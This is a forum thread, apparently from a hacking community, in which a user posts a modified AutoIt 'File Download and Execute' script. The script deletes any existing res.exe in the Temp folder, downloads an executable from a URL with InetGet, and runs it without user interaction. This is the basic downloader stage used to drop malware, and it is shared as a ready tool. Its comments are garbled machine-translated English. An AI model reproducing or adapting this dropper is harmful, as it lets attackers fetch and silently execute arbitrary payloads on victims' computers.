Jump to content
YOUR-AD-HERE
HOSTING
TOOLS
992Proxy

Locked File Download and Execute ("InetGet") by enzo_


sQuo

Recommended Posts

  • 2 weeks later...

Re: File Download and Execute ("InetGet") by enzo_

 

Fui a usarlo pero tenia muchisimos errores, ahi lo dejo modificado y funcional:

 

#cs ------------------------------------------------ ----------------------------

 

, Author: enzo_ (Modificado por ErKali)

; Language: AutoIt

; Function: File Download and Execute

;

This is the hidden content, please

 

#ce ------------------------------------------------ ----------------------------

If FileExists (@TempDir & "\res.exe") Then; Verifies that the Temp folder exists If the file resource.exe

FileDelete (@TempDir & "\res.exe"); resource.exe Deletes the file if it exists in the TEMP folder

Sleep(1000); Delay of 1 second

EndIf

 

$UrlDownloader = "http://www.angusj.com/resourcehacker/reshack_setup.exe"; Sets the variable $ UrlDownload is the Link "http://www.angusj.com/resourcehacker/reshack_setup.exe"

$Directory = @TempDir & "\res.exe"; Sets the variable $ Directory is installed on and I'm afraid to be "\ resource.exe"

InetGet ($UrlDownloader, $Directory); Declaring function Inetget variables ($ UrlDownloader, $ Directory)

Run ($Directory); Performs variable $ serpa Directory that file TempDir @ & "\ resource.exe"

Sleep (5000); Delay 5 Seconds

Link to comment
Share on other sites

Guest
This topic is now closed to further replies.
×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.